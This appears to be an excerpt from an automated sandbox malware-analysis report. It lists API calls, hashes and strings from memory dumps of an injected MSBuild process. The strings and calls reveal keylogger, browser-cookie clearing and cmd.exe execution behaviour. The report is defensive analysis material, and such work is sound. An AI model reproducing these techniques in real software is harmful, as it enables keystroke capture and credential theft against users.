                                                                                                                                                                                    • Opcode ID: fcd139a15132826d048fc9099f5513e63a32d772a8cf7c4d95b98b470fd5f9fd
                                                                                                                                                                                    • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                                                                                                                                                    • Opcode Fuzzy Hash: fcd139a15132826d048fc9099f5513e63a32d772a8cf7c4d95b98b470fd5f9fd
                                                                                                                                                                                    • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                                                                                                      • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                      • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                                                                                    • String ID: Online Keylogger Started
                                                                                                                                                                                    • API String ID: 112202259-1258561607
                                                                                                                                                                                    • Opcode ID: 1a35105b2445a8ebc904048b9bfc8e08726f4dfb0f7c8d04cd20acbdd1743331
                                                                                                                                                                                    • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a35105b2445a8ebc904048b9bfc8e08726f4dfb0f7c8d04cd20acbdd1743331
                                                                                                                                                                                    • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                                                                                                                                                    • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 0044AAFE
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                    • String ID: `@
                                                                                                                                                                                    • API String ID: 2583163307-951712118
                                                                                                                                                                                    • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                                                                                    • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                                                                                                                                                    • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                                                                                    • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseEventHandleObjectSingleWait
                                                                                                                                                                                    • String ID: Connection Timeout
                                                                                                                                                                                    • API String ID: 2055531096-499159329
                                                                                                                                                                                    • Opcode ID: 9041f7ae570b413ce327d744802055146d1c38930b1ad49fa8d24b0939116539
                                                                                                                                                                                    • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9041f7ae570b413ce327d744802055146d1c38930b1ad49fa8d24b0939116539
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                                                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                                                                                                                      • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                                                                                                                                                      • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                    • API String ID: 3628047217-1405518554
                                                                                                                                                                                    • Opcode ID: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                                                                                                                    • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExecuteShell
                                                                                                                                                                                    • String ID: /C $cmd.exe$open
                                                                                                                                                                                    • API String ID: 587946157-3896048727
                                                                                                                                                                                    • Opcode ID: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
                                                                                                                                                                                    • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
                                                                                                                                                                                    • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                                                                                    • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                                                                    • TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: TerminateThread$HookUnhookWindows
                                                                                                                                                                                    • String ID: pth_unenc
                                                                                                                                                                                    • API String ID: 3123878439-4028850238
                                                                                                                                                                                    • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                                                                                    • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                                    • String ID: GetCursorInfo$User32.dll
                                                                                                                                                                                    • API String ID: 1646373207-2714051624
                                                                                                                                                                                    • Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                                                                                                                    • Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
                                                                                                                                                                                    • Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                                                                                                                    • Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                    • String ID: GetLastInputInfo$User32.dll
                                                                                                                                                                                    • API String ID: 2574300362-1519888992
                                                                                                                                                                                    • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                                                                                                    • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                                                                                                    • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1036877536-0
                                                                                                                                                                                    • Opcode ID: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                                                                                                                                                                    • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                                                                                                                                                                    • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                                                                                                                                                    • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                                                                                                                                                    • Opcode Fuzzy Hash: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                                                                                                                                                    • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                                                                                                    • __freea.LIBCMT ref: 100087D5
                                                                                                                                                                                      • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2652629310-0
                                                                                                                                                                                    • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                                                    • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                                                                                                    • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                                                                                                                                    • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                    • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                                                                                    • API String ID: 3472027048-1236744412
                                                                                                                                                                                    • Opcode ID: fb9c94c919f491c47112702eb50a98d9c9131fc5c480903e1a404da5156a74b6
                                                                                                                                                                                    • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                                                                                                                                                    • Opcode Fuzzy Hash: fb9c94c919f491c47112702eb50a98d9c9131fc5c480903e1a404da5156a74b6
                                                                                                                                                                                    • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                                                                      • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                                                                      • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                                                                    • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpenQuerySleepValue
                                                                                                                                                                                    • String ID: @CG$exepath$BG
                                                                                                                                                                                    • API String ID: 4119054056-3221201242
                                                                                                                                                                                    • Opcode ID: 210cb540f6a83319de20fac2fd682447bc31916e54f5a605e097a05a178efdaa
                                                                                                                                                                                    • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                                                                                                                                                    • Opcode Fuzzy Hash: 210cb540f6a83319de20fac2fd682447bc31916e54f5a605e097a05a178efdaa
                                                                                                                                                                                    • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EnumDisplayMonitors.USER32(00000000,00000000,004186FC,00000000), ref: 00418622
                                                                                                                                                                                    • EnumDisplayDevicesW.USER32(?), ref: 00418652
                                                                                                                                                                                    • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004186C7
                                                                                                                                                                                    • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004186E4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DisplayEnum$Devices$Monitors
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1432082543-0
                                                                                                                                                                                    • Opcode ID: d5f935f21ff977a325b16e0238022c9b65baa15484adc771af36005d0498d86d
                                                                                                                                                                                    • Instruction ID: c4057a13d51126afc728f52e86ef46095e095b9ab785e002ac05b4ca5e4d76c5
                                                                                                                                                                                    • Opcode Fuzzy Hash: d5f935f21ff977a325b16e0238022c9b65baa15484adc771af36005d0498d86d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9221B1722043046BD220EF16DC44EABFBECEFD1754F00052FB949D3191EE74AA45C6AA
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: SystemTimes$Sleep__aulldiv
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 188215759-0
                                                                                                                                                                                    • Opcode ID: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                                                                                                                                                    • Instruction ID: 3b66203fd79088dfadce72ddbf0b0401c54eb4bd27628439374ba0e7aa9136f0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D215E725083009BC304DF65D98589FB7E8EFC8654F044A2EF589D3251EA34EA49CB63
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                                                                                                                                                      • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                                                                                                                                                      • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$SleepText$ForegroundLength
                                                                                                                                                                                    • String ID: [ $ ]
                                                                                                                                                                                    • API String ID: 3309952895-93608704
                                                                                                                                                                                    • Opcode ID: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
                                                                                                                                                                                    • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                                                                                                    • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                                                                                                                                                    • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
